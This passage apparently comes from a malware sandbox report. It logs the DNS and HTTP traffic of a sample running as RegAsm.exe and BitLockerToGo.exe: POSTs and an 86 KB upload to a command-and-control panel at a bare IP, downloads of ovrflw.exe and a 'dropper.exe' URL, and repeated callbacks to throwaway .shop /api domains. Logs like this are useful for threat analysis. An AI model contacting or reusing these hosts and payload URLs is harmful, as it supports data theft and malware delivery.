Host: fastcareasy.store

Response

HTTP/1.1 204 No Content

Date: Sun, 01 Sep 2024 04:42:08 GMT
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wv0VXyqOfJN23JnizHN2VUMqxuusUNj5GLqV%2BTG7Yqn9vSxSwBnpc4zZ0c34ilujBV%2B865V5gDjP3fPEh%2F0m00TAYxd8Lc9m7t4xGMMsTLK5Yw1UG5YQuJ1yRR%2FEJgo0JZ3q4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297866e047743-LHR
alt-svc: h3=":443"; ma=86400
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

180.53.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

180.53.21.104.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.19/CoreOPT/index.php

RegAsm.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

RegAsm.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php?scr=1

RegAsm.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODU5Mjc=
Host: 185.215.113.19
Content-Length: 86079
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

RegAsm.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

RegAsm.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/ovrflw.exe

RegAsm.exe

Remote address:

185.215.113.16:80

Request

GET /inc/ovrflw.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 04:42:14 GMT
Content-Type: application/octet-stream
Content-Length: 5562368
Last-Modified: Sat, 31 Aug 2024 22:58:09 GMT
Connection: keep-alive
ETag: "66d3a001-54e000"
Accept-Ranges: bytes
DNS

19.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.113.215.185.in-addr.arpa

IN PTR

Response
DNS

tmpfiles.org

RegAsm.exe

Remote address:

8.8.8.8:53

Request

tmpfiles.org

IN A

Response

tmpfiles.org

IN A

172.67.195.247

tmpfiles.org

IN A

104.21.21.16
GET

https://tmpfiles.org/dl/12052740/dropper.exe

RegAsm.exe

Remote address:

172.67.195.247:443

Request

GET /dl/12052740/dropper.exe HTTP/1.1
Host: tmpfiles.org

Response

HTTP/1.1 404 Not Found

Date: Sun, 01 Sep 2024 04:42:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
CF-Cache-Status: BYPASS
Set-Cookie: XSRF-TOKEN=eyJpdiI6IjhaWW1zRnU4dExXejcvazJqZ1dYSUE9PSIsInZhbHVlIjoiYS9rTGdNYkhCb3k4S3VaQmV2aVdVdk1QbCtNbHNmcTh1dW5PZWJZODl3Q28rKy84VDRYMVFHZmgwOWdXREU4eHV0amdIL1hhRWhzSmFOUEgxRjdPZUN4aHdXRUc2Z0ZGOU9EYWpKOHhIUjh4a0ZsTzlYQUUwT0FIL1FrLzZJQ08iLCJtYWMiOiJkMTk4NDhlNThjMGYzNTdmODNlZDAwZTQyYWUwYjM2YTY5Y2JjMzNjNDZhMzI5ZjQ3ODM2MjEwMzdhM2RhMTBmIn0%3D; expires=Sun, 01-Sep-2024 06:42:17 GMT; Max-Age=7200; path=/; samesite=lax
Set-Cookie: tmpfiles_session=eyJpdiI6IldCb0F0RVBWejJxWFdtNlJldjNtWGc9PSIsInZhbHVlIjoiMXQyOXl5MUNENjBLQlA4V1VNSWZsSXBVeEVMaE1PdVBYQ1ErNzJRM2l3Y0dSV0ZBZjV2bmtja2E3L0RBQm9UaFNhU0l0Zi9TNGM1WU1jT1pRL0E2OTd5WTROOVhYU0dNeWhtM1pialZMc044bkZ2ZjJPTzlXTEZJekNqeGZ1V0giLCJtYWMiOiIwNzYzMDYyM2NhNTY4NThjN2RlODRkZjg3MDFlYWU3MmI3NTA3NjVjMWQyODEyYjk2MjhhZGY1NTFmNzFlNDdlIn0%3D; expires=Sun, 01-Sep-2024 06:42:17 GMT; Max-Age=7200; path=/; httponly; samesite=lax
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYuRJsMuXWbYw3rku5eaBBn8%2BibCHFEPzJ9Gcz5DFohXW%2BO8sJB6pqV5GodtUzjnwKcJC2bKQ1CFLQQXwptKdEP0deapVvAKGJwzQDo5yd%2FWU9PiCikZydDVFafCK8Y%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297c2cbb552ed-LHR
alt-svc: h3=":443"; ma=86400
DNS

c.pki.goog

RegAsm.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.178.3
GET

http://c.pki.goog/r/gsr1.crl

RegAsm.exe

Remote address:

142.250.178.3:80

Request

GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sun, 01 Sep 2024 04:05:07 GMT
Expires: Sun, 01 Sep 2024 04:55:07 GMT
Cache-Control: public, max-age=3000
Age: 2230
Last-Modified: Mon, 08 Jul 2024 07:38:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
GET

http://c.pki.goog/r/r4.crl

RegAsm.exe

Remote address:

142.250.178.3:80

Request

GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sun, 01 Sep 2024 04:26:29 GMT
Expires: Sun, 01 Sep 2024 05:16:29 GMT
Cache-Control: public, max-age=3000
Age: 948
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

247.195.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

247.195.67.172.in-addr.arpa

IN PTR

Response
DNS

3.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.178.250.142.in-addr.arpa

IN PTR

Response

3.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f31e100net
DNS

evoliutwoqm.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

evoliutwoqm.shop

IN A

Response
DNS

locatedblsoqp.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

locatedblsoqp.shop

IN A

Response

locatedblsoqp.shop

IN A

172.67.207.182

locatedblsoqp.shop

IN A

104.21.58.213
POST

https://locatedblsoqp.shop/api

BitLockerToGo.exe

Remote address:

172.67.207.182:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: locatedblsoqp.shop

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:42:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N7FL4JVct6ZbaajoUiQWG5sT6rsIOG7Adv1lpPTlOKOqarZuUvhFnSaEVvo%2FqO%2Fcu0NixnrmsYHRSW2R%2BkgMEbgDhBLlT5i%2Bs3mIAmCjVBhOv2Ovq7uxJasMoBQRg0g57Hp7deA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297d5dc9093fc-LHR
POST

https://locatedblsoqp.shop/api

BitLockerToGo.exe

Remote address:

172.67.207.182:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=gsOR2vUnekSaSucwx4f4Dgpi1Yl9DLchIMHlJout5AE-1725165740-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 80
Host: locatedblsoqp.shop

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:42:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=hv8431blbmtibf7rb92r5ueir0; expires=Wed, 25 Dec 2024 22:28:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fyipXiPJenJ2Nqj57DaIhfXCbDgrWOC2oF0ibXF3J%2FKHWuZ24Go9bgHIS4qZgYhhbC6MH4yz4n73632YjXOC%2BsK8b7JZ%2BTGBtQd%2BKRisius8I4QezoeuQOH9h0jh9UZJ8q5mdk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297d69cef93fc-LHR
alt-svc: h3=":443"; ma=86400
DNS

182.207.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.207.67.172.in-addr.arpa

IN PTR

Response
DNS

millyscroqwp.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

millyscroqwp.shop

IN A

Response

millyscroqwp.shop

IN A

104.21.84.66

millyscroqwp.shop

IN A

172.67.187.171
POST

https://millyscroqwp.shop/api

BitLockerToGo.exe

Remote address:

104.21.84.66:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: millyscroqwp.shop

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:42:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=1s47ea4t85bvpdq4sjjf4hsosd; expires=Wed, 25 Dec 2024 22:29:00 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VE3C1YsbRYxMyttFjB4G61o%2FyOM9VLPxlRb%2FTheCM7alezBgONONMbyOs7wcgkv1n4tpfS1P6KD2U3OPXh2iJURdBdhG5VldYGJdM8zEAe0iUF3%2FsI8pFCVBZKnvUtZ2GRQfTA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297dc885a93fc-LHR
alt-svc: h3=":443"; ma=86400
POST

https://locatedblsoqp.shop/api

BitLockerToGo.exe

Remote address:

172.67.207.182:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: locatedblsoqp.shop

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:42:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyxwFoe2vMctkzHJVhrz2PebF4PTeJnIJ9%2FsPG3A0GCoxWU54z9hw2J%2Fs3BFnSEBozeRDN%2FeTvFHo4UQb3RxHU3sPZq0BJ%2B4TNPNRZuzJiPwS79DWCMphvHYgjYSxV0%2BaR9GQOE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297df4fd89494-LHR
POST

https://locatedblsoqp.shop/api

BitLockerToGo.exe

Remote address:

172.67.207.182:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=V1dsXj8hWJWMa3V_DRbd_NZe.QkitrQIlQVglFoQS80-1725165741-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 45
Host: locatedblsoqp.shop

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:42:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fpu91auh3lv6j0avt7riuefcmf; expires=Wed, 25 Dec 2024 22:29:01 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6JLf2bCEX56N%2Fw0jxfiiT5p0U6b6hFD0Uto%2FFbzDuaLMrUgaZTgbc8TIGFjNqgcC6WBOl7ZNOfwpdTYbr1U6n%2FxKU1V0KpLNcQgREpRL67S74MXpEUhh4plMf%2BUtn03eL0QWPfY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297dff8299494-LHR
alt-svc: h3=":443"; ma=86400
DNS

66.84.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

66.84.21.104.in-addr.arpa

IN PTR

Response
POST

https://millyscroqwp.shop/api

BitLockerToGo.exe

Remote address:

104.21.84.66:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: millyscroqwp.shop

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:42:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=u7jm8njbn5assa22m48c1nunb8; expires=Wed, 25 Dec 2024 22:29:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fh4jGEo5yaL4fBUcYEuB%2FjdD0SWDbc%2BrnzJlNdMNV2vo7Qo97N85YW34Gy%2B83ExIi4J4ssezqD2f%2Br%2Ft0yGui9%2BndNUvW%2F894UtaJAMQX9xSakDKTJTGk2oiR5U0dfEbcG4xVg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297f73a08bd86-LHR
alt-svc: h3=":443"; ma=86400
POST

https://locatedblsoqp.shop/api

BitLockerToGo.exe

Remote address:

172.67.207.182:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: locatedblsoqp.shop

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:42:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4J0HGhHMjlWbuwLbZJ56ABer3RK7Not2Ucr6ffeTgrCU6OeEW07gcqDt0U%2BfjeRth%2Fev1EAdUXNvNabdQWnRI8s7wp24gQbEGW9Go3TppSKzSwwZSqJqOdKHBXAfM5m%2BfOFyh%2B0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297f97af1bd98-LHR
POST

https://locatedblsoqp.shop/api

BitLockerToGo.exe

Remote address:

172.67.207.182:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=WueorW0M_n4BBi2cr7WJqX8Px_PYD8WzKLuvzxC4cV0-1725165746-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 45
Host: locatedblsoqp.shop

Response

HTTP/1.1 200 OK

Date: Sun, 01 Sep 2024 04:42:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=jgameghvmimqv528qn35alu9fi; expires=Wed, 25 Dec 2024 22:29:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZQIGC0IbRFKuTaONhr5%2BZ14Uxgv6wI%2BW74RN%2FZKZOHi8G%2B%2Bte0TP2i5N8G6DCk4gvFk7wP%2B2D3HJkQT80GT88vD0Jr4bVeoALPvxmvkzL6pUy8nSAKdWqX178DCDLQOvK0vF56I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bc297fa3b67bd98-LHR
alt-svc: h3=":443"; ma=86400
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360505011_123FH55PMWQ5EA6JP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360505011_123FH55PMWQ5EA6JP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 356644
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9F93F833D58F4D96B0E524B719A073EE Ref B: LON04EDGE0910 Ref C: 2024-09-01T04:42:44Z
date: Sun, 01 Sep 2024 04:42:43 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301242_1SRW05UUR0YI3F1X9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239317301242_1SRW05UUR0YI3F1X9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 399396
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FCD4E6BF498E43C3ACFACEE87C262489 Ref B: LON04EDGE0910 Ref C: 2024-09-01T04:42:44Z
date: Sun, 01 Sep 2024 04:42:43 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360504960_1PLAHYZB4JQO28JRC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360504960_1PLAHYZB4JQO28JRC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 540156
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DB04C12041814A07BEF7A417D2C48049 Ref B: LON04EDGE0910 Ref C: 2024-09-01T04:42:44Z
date: Sun, 01 Sep 2024 04:42:43 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418543_1PQIQEA9PYCCTOZ9T&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239340418543_1PQIQEA9PYCCTOZ9T&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 748526
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6448B34EE987432ABCC4484D8C8368F4 Ref B: LON04EDGE0910 Ref C: 2024-09-01T04:42:44Z
date: Sun, 01 Sep 2024 04:42:43 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418544_1U65HGUXV07UFEU5B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239340418544_1U65HGUXV07UFEU5B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 800536
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
